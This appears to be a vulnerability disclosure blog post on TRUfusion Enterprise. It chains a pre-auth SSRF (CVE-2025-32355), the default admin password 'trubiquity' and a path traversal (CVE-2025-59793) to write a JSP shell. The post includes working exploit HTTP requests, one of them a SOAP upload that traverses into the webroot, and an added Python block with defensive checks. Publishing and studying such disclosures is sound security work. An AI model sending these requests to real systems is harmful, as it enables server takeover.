In September 2025, we published a research article describing multiple pre-auth vulnerabilities in Rocket Software’s TRUfusion Enterprise, a product marketed as a “secure data exchange platform”. Our analysis demonstrated that an unauthenticated attacker could fully compromise a TRUfusion instance without possessing valid credentials.

One issue we intentionally excluded from that initial publication was an additional, high-impact server-side request forgery vulnerability (CVE-2025-32355) that remained unpatched for almost a year. This SSRF can be chained with the default password trubiquity and an additional path traversal vulnerability in the WsPortalV6UpDwAxis2Impl service (CVE-2025-59793) to achieve pre-auth remote code execution once again.

Full Read Pre-Auth SSRF (CVE-2025-32355)

TRUfusion Enterprise uses a reverse proxy to route different endpoints to different internal services. However, the proxy is misconfigured to accept absolute URLs in the HTTP request line. When such a request is received, the proxy incorrectly treats the supplied URL as a routable backend target and initiates an outbound request to the specified resource, returning the response to the client. As a result, an attacker can force the proxy into fetching and proxying arbitrary external resources, effectively turning it into an unauthenticated forward proxy.

The following example demonstrates this behaviour by loading our website:

GET https://www.rcesecurity.com/ HTTP/1.1
Host: target.com

While this behaviour is already problematic by effectively exposing the service as an open, unauthenticated forward proxy, the proxy can also be abused to access internal services. By specifying internal IP addresses or hostnames as the absolute URL, an attacker can reach otherwise non-exposed internal applications, such as a related Keycloak instance:

A full-read SSRF is already a powerful vulnerability, and, in the case of TRUfusion, it can be used to query an interesting Axis2 interface that is only reachable via localhost:

Post-Auth Path Traversal (CVE-2025-59793)

The Axis2 instance exposes a service called WsPortalV6UpDwAxis2Impl, which can be used to upload files through an XML request like this:

POST http://localhost/axis2/services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
SOAPAction: urn:uploadFile
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: text/xml
Content-Length: 1531

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
   <soapenv:Header/>
   <soapenv:Body>
      <updw:uploadFile>
         <!--type: string-->
         <updw:login>admin</updw:login>
         <!--type: string-->
         <updw:password>trubiquity</updw:password>
         <!--type: string-->
         <updw:archiveName>shell.jsp</updw:archiveName>
         <!--type: string-->
         <updw:jobNumberSend></updw:jobNumberSend>
         <!--type: string-->
         <updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
         <!--type: base64Binary-->
         <updw:dataHandler>Ly95b3VyIGpzcCBjb2RlIGhlcmU=</updw:dataHandler>
      </updw:uploadFile>
   </soapenv:Body>
</soapenv:Envelope>

You might have noticed three things in this request:

  1. The service requires a username and password; however, the administrative account ships with the default password trubiquity. If you’re lucky, the TRUfusion administrator hasn’t changed that password, since changing it appears to be an optional step according to their documentation.

  2. The jobDirectory parameter accepts path traversal sequences, allowing an attacker to escape the intended upload directory. When combined with the archiveName and dataHandler parameters, this enables writing attacker-controlled files to arbitrary locations on the file system, with the file contents supplied as base64-encoded data.

  3. Our exploit chains the path traversal with the previously described SSRF (CVE-2025-32355) because the Axis2 instance is bound to localhost and as such isn’t reachable from outside. However, we noticed that this is not true for all TRUfusion versions, and some expose the Axis2 interface directly.
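Two defensive checks for the issues described above, added here as example code (not from the original post or from Rocket Software): flagging absolute-form request-targets in reverse-proxy access logs, which is the indicator of the SSRF, and a hardened path join for the uploadFile parameters that refuses the jobDirectory traversal. The log lines and the base directory /opt/TRUfusion/data/jobs are constructed assumptions.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample access-log lines (not from the original post): one normal
# origin-form request, then two absolute-form request lines of the kind the
# misconfigured proxy routes outbound (an external site, then the loopback-only
# Axis2 service).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2025:10:00:00 +0000] "GET /trufusionPortal/ HTTP/1.1" 200 512
10.0.0.9 - - [01/Oct/2025:10:00:01 +0000] "GET https://www.rcesecurity.com/ HTTP/1.1" 200 8812
10.0.0.9 - - [01/Oct/2025:10:00:02 +0000] "POST http://localhost/axis2/services/WsPortalV6UpDwAxis2Impl HTTP/1.1" 200 1024
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def is_absolute_form(target: str) -> bool:
    """A request-target with scheme and authority (absolute-form) is what a forward
    proxy expects; a reverse proxy serving fixed routes should never honour it."""
    parts = urlsplit(target)
    return bool(parts.scheme and parts.netloc)


def flag_absolute_form_requests(log_text: str) -> list:
    """Return (method, target) for every log line whose target is absolute-form."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m and is_absolute_form(m.group("target")):
            hits.append((m.group("method"), m.group("target")))
    return hits


def resolve_upload_path(base_dir: str, job_directory: str, archive_name: str) -> Optional[str]:
    """Hardened handling of the uploadFile parameters: archiveName may not carry a
    directory component, jobDirectory is always taken relative to base_dir, and the
    normalised result must stay inside base_dir. Returns the path or None if rejected."""
    if not archive_name or archive_name != posixpath.basename(archive_name) \
            or archive_name in (".", ".."):
        return None
    base = posixpath.normpath(base_dir)
    # normpath collapses the "/../../.." sequences so the containment check is exact.
    candidate = posixpath.normpath(posixpath.join(base, job_directory.lstrip("/"), archive_name))
    if not candidate.startswith(base + "/"):
        return None
    return candidate
```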

This way, you can upload the same shell as used in our previous exploit:

To gain remote code execution (again):

Stay safe out there.